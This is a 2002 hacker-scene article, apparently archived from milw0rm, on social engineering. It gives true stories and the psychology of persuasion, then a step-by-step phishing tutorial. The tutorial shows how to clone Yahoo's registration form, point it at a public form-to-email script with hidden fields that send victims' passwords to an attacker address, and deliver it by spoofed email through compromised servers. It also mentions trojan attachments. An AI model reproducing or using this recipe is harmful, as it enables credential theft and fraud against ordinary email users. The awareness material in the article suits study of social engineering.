Author : <Simo/_6mO_HaCk> simo_at_morx_org
Title : Social Engineering, Definition, true stories and exemples
Date : 11/22/2002
True stories
a anonymous person called a woman and says he is from her Local
company customer service and due to a local error some of the
customers data including Credit Cards and Social Security numbers
have been deleted. The anonymous person asked the lady then to
give him again her billing information, including the billing
address,first and last name, the Credit card number, expire date
and social security number that used to be in file before the
incident. 20 days later the lady received her billing statement
with 2500 $ to be paid as it was ordered : 1 digital camcorder
1 laptop, 3 mp3 and 2 dvds players.
it's not always that every hacker is sitting in front his computer
trying to hack into private networks by exploiting vulnerable
servers in order to get private information such as credit cards
numbers ... sometimes all they do is give it
a call and exploit the humain stupidity
"There's always the technical way to break into a network but
sometimes it's easier to go through the people in the company.
You just fool them into giving up their own security," says Keith A. Rhodes,
chief technologist at the U.S. General Accounting Office, which has a
Congressional mandate to test the network security at 24 different
government agencies and departments.
Another true story recounted by Kapil Raina, currently a security expert at
Verisign and co-author of mCommerce Security: A Beginner's Guide, based on
an actual workplace experience with a previous employer
The story said
One morning a few years back, a group of strangers walked into a
large shipping firm and walked out with access to the firm.s entire
corporate network. How did they do it? By obtaining small amounts
of access, bit by bit, from a number of different employees in that
firm. First, they did research about the company for two days before
even attempting to set foot on the premises. For example, they learned
key employees. names by calling HR. Next, they pretended to lose
their key to the front door, and a man let them in. Then they "lost"
their identity badges when entering the third floor secured area,
smiled, and a friendly employee opened the door for them.
The strangers knew the CFO was out of town, so they were able to
enter his office and obtain financial data off his unlocked computer.
They dug through the corporate trash, finding all kinds of useful
documents. They asked a janitor for a garbage pail in which to place
their contents and carried all of this data out of the building in their
hands. The strangers had studied the CFO's voice, so they were able
to phone, pretending to be the CFO, in a rush, desperately in need
of his network password. From there, they used regular technical
hacking tools to gain super-user access into the system.
In this case, the strangers were network consultants performing a
security audit for the CFO without any other employees' knowledge.
They were never given any privileged information from the CFO but
were able to obtain all the access they wanted through social
engineering.
2- Definition
I've readed too many articles of social engineering defining The basic
goals of social engineering, and the different ways used by hackers,
the goal is simply the same as hacking in general; gaining private
information from a humain under some persuasion and influence in order
to perform fraud, espionage, or simply to access a system or a network.
targets can include commercial companies, financial and cultural
institutions, hospitals or simply a yahoo account :)
3- Persuasion and influence techniques
A substantial body of literature in social psychology demonstrates
that there are at least six factors relying on peripheral routes to
persuasion that are highly likely to persuade or influence others
Authority : People are highly likely, in the right situation, to be
highly responsive to assertions of authority, even when the person
who purports to be in a position of authority is not physically present
A study of three Midwestern hospitals showed how responsive people can
be to such assertions. In the study, 22 separate nurses' stations were
contacted by a researcher who identified himself (falsely) as a hospital
physician, and told the answering nurse to give 20 milligrams of a
specified prescription drug to a particular patient on the ward. Four
factors should have indicated that the nurses might have questioned
the order: It came from a "doctor" with whom the nurse had never before
met or spoken; the "doctor" was transmitting a prescription by telephone,
in violation of hospital policy; the drug in question was not authorized
for use on the wards; and the dosage that the "doctor" had specified was
clearly dangerous, twice the maximum daily dosage. Yet in 95 percent of
the cases, the nurse proceeded to obtain the necessary dosage from the
ward medicine cabinet and was on her way to administer it to the patient
before observers intercepted her and told her of the experiment.
Scarcity : People are also highly responsive to indications that a
particular item they may want is in short supply or available for
only a limited period. Indeed, research by Dr. Jack Brehm of Stanford
University indicates that people come to desire that item even more when
they perceive that their freedom to obtain it is or may be limited in
some way. The belief that others may be competing for the short supply
of the desired item may enhance the person's desire even more.
Liking and similarity. It is a truly human tendency to like people
who are like us. Our identification of a person as having characteristics
identical or similar to our own -- places of birth, or tastes in sports,
music, art, or other personal interests, to name a few -- provides a
strong incentive for us to adopt a mental shortcut, in dealing with that
person, to regard him or her more favorably merely because of that similarity.
Reciprocation. A well-recognized rule of social interaction requires that
if someone gives us (or promises to give us) something, we feel a strong
inclination to reciprocate by providing something in return. Even if the
favor that someone offers was not requested by the other person, the person
offered the favor may feel a strong obligation to respect the rule of
reciprocation by agreeing to the favor that the original offeror asks in
return -- even if that favor is significantly costlier than the original favor.
Commitment and consistency. Society also places great store by consistency
in a person's behavior. If we promise to do something, and fail to carry
out that promise, we are virtually certain to be considered untrustworthy
or undesirable. We therefore are more likely to take considerable pains to
act in ways that are consistent with actions that we have taken before, even
if, in the fullness of time, we later look back and recognize that some
consistencies are indeed foolish.One way in which social custom and
practice makes us susceptible to appeals to consistency is the use of
writing. A leading social psychologist, Professor Robert B. Cialdini,
has observed that unless there is strong evidence to the contrary,
"People have a natural tendency to think that a statement reflects the
true attitude of the person who made it." Moreover, once the person who
receives such a statement responds by preparing a written statement of
his own -- whether a letter, an affidavit, or an e-mail -- it tends to
make the writer believe in what he has written as well, adding to the
impression that both parties have displayed their true attitudes and beliefs.
Social proof : In many social situations, one of the mental shortcuts on
which we rely, in determining what course of action is most appropriate,
is to look to see what other people in the vicinity are doing or saying.
This phenomenon, known as social proof, can prompt us to take actions that
may be against our self-interest without taking the time to consider them
more deeply. Cults from the Jonestown Temple to Heaven's Gate, for example,
provide cogent evidence of how strong the effects of that phenomenon can be
in the right circumstances.
4- Some ways used by hackers
A- Online applications to Internet-fraud purposes :
E-mails passwords and Credit cards numbers
In this section i'm going to add an influence that have not been notified
above, which's The influence of "greed" : let's say Someone with an electronic
mail somewhere on the net receives a great e-mail giving him the chance
to win 10.000 $ or a mercedes 2003 in reward of just entering his password
and username for verification and registration purposes or sometimes even
the victim is asked for his credit card and social security number for
the same purpose. Basicaly this technique is ofen used to steal credit
cards from online auctions users and web based email accounts
The other classic well known method based on the auhtority influence
which consists of sending an e-mail with a form asking the victim
to re-enter his username/password or filling out a new registration
form due to a local error that erased customers personal information
including passwords,birth of dates, and secret questions answer.
In fact the attacker doesnt need to be a good html/java/php programmer to
code such forms, or simply the attacker doesnt need to bother himself and
waste his time coding html, in this section i'll explain how it's
easly to make online forms and web server script to get the data and then send
it back to the sender e-mail.
well first of all i know that most of you know how an html post form works and
how the web server script gets data and then process it but let's get an
overview with examples
how can an attacker easly make a form in sometimes less than 5 minutes ?
ok, let's say we are interessted in a yahoo account password, in
that case the attacker chooses the type of influence, the attacker
decided to take the authority influence, the bad guy goes first to
mail.yahoo.com and try to sign up a new account, guess what will
he/she get, a registration form already written
(http://edit.yahoo.com/config/eval_register?
.v=&.intl=&new=1&.done=&.src=ym&.partner=&.
p=&promo=&.last=so) here we got the form and need
just to modify some functions.
The secend step is to get the html source of the page in order to
modify on it, all we have to do is remove
(<FORM name=IOS onsubmit="return hash(this)"
action=https://edit.yahoo.com/config/register)
which call the yahoo web script to process the data being sent and put
our own script http address path, and bellow remove all these arguments
(used for yahoo script) <INPUT type=hidden
value=1 name=.save> <INPUT type=hidden value=0 name=.accept> <INPUT type=hidden
name=.demog> <INPUT type=hidden name=.done> <INPUT type=hidden name=.fam> <INPUT
type=hidden name=.i> <INPUT type=hidden name=.last> <INPUT type=hidden value=ym
name=.src> <INPUT type=hidden value=0 name=.regattempts> <INPUT type=hidden
name=.partner> <INPUT type=hidden name=promo> <INPUT type=hidden name=.ignore>
<INPUT type=hidden name=.pwtoken> <INPUT type=hidden value=ets8ig8vfdqbg
name=.u> <INPUT type=hidden value=1 name=.v> <INPUT type=hidden name=.md5>
<INPUT type=password maxLength=32 name=.pw <INPUT type=password maxLength=32 name=.pw2
and put the appropriate new web server arguments, ok now the next
step, oh wait i forgot to mention something, if you see carefully
in the yahoo registration form you will see some extra java actions,
and since we have added our new webserver address we must remove
them otherwise our web script is not gonna be called, well let's jump
to the next part, now that we have modified the form, we need
to make a small php/perl script to proccess the data
that we wishes to get, so now the attacker got two option, make/download
a pre-made php/perl script and put it on a compromised server, or find a public web mail script
there are thousands of those scripts on the internet
that are already waiting to serve with no verifications or restrictions
they can be located using any search engine like google or even scanned, but note that the attacker should
know some scripts names so he/she can perform successfully the search, a well
known script used often called form2email.pl can be easly located.
after a search on using google we get a bunch of those, www.alibaweb.net/cgi-bin/services/form2email.pl
as an exemple cool now all we got to do is to include those arguments in the html form:
<input type=hidden name="recipient" value="ATTACKER@E-MAIL.com">
This is the attacker e-mail value (where the data will be returned)
<input type=hidden name="subject" value="Successfully hacked">
The e-mail subject
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT,REMOTE_ADDR">
Victim IP address and hostname (not really needed)
<INPUT TYPE="HIDDEN" VALUE="http://mail.yahoo.com" NAME="redirect">
Where we want the web mail script to redirect the victim after submiting the form
mail.yahoo.com is ideal since he gotta automatically be redirected into his box
<INPUT type=password maxLength=32 name="passwd"
<INPUT type=password maxLength=32 name="passwd2"
Our victim password value, the most important value :]
and finaly the attacker add a message like
<TD><FONT face=arial color=red><B>Due to an involuntary local error your
informations has been deleted from our database, please take some minutes
to re-fill the following. Your informations will be immediatly recorded
after submiting. Thanks.
</B></FONT>
a pre-coded copy of the above example could be found at :
www.angelfire/linux/simooo/simohackyahoo.html
and example of a perl web based e-mailer can be found also at :
www.angelfire/linux/simooo/emailer.pl
(For educational and demonstration purposes only)
Now all the attacker got to do is to use one of his compromised server to
send the spoofed email to his victim using an email spoofer like htmlbomb.pl which can be found at
www.morx.org/htmlbomb.txt or any program like ghosted.exe for windows which already has
a list of public SMTP server in order included, the attacker spoofed e-mail will look
like admin@yahoo.com or CService@yahoo.com
influencing the victim could be done in many forms, and many ways trust
authority by sending html forms, attaching backdoors trojans which would give complete
access to the victim computer
A good example of this was an AOL hack, documented by
VIGILANTe: .In that case, the hacker called AOL.s tech support
and spoke with the support person for an hour. During the
conversation, the hacker mentioned that his car was for sale cheaply.
The tech supporter was interested, so the hacker sent an e-mail attachment
.with a picture of the car.. Instead of a car photo, the mail executed
a backdoor exploit that opened a connection out from AOL through the firewall..
Online auctions :
Here we can say that 3 of the psychological influences mentioned
above are dominant in these frauds: through the victim's identification
of someone good that he is prepared to buy immediately at a price he or
she considers acceptable; reciprocity, through the criminal's promise to
deliver the ordered goods once the victim has sent payment; and similarity,
through the victim's willingness to do business with someone who apparently
shares his or her interests in the collectible or computer merchandise being
sold.
5- Reverse Social Engineering
A final, and advanced method of gaining valuable information is
known as .reverse social engineering.. This is when the hacker
appears in a position of authority so that employees will ask him
for information, If analysed, planned and executed well,
reverse social engineering attacks may offer the hacker an even
better chance of success
6- Conclusion :
Social Engineering has different ways and purposes, hacking email passwords
credit cards, backdooring and so on, Social Engineering is just unpatched since
humain influence/ignorance/stupidity will keep existing.
Other References :
http://www.ameritech.com/content/0,3086,92,00.html
http://www.natlconsumersleague.org/top10net.htm
http://usatoday.com/life/cyber/tech/cte414.htm
http://www.it.com.au/jargon/social_engineering.html
http://www.seas.rochester.edu:8080/CNG/docs/Security/node9.html
http://www.ciac.org/ciac/notes/Notes03a.shtml#Engineering
Informatics," http://www.ifi.uio.no/iris20/proceedings/9.htm
http://www.cert.org/advisories/CA-91.04.social.engineering.html
http://www.newscientist.com/ns/981031/nspam.html
http://www.news.com/News/Item/Textonly/0,25,17318,00.html
# milw0rm.com [2006-04-08]
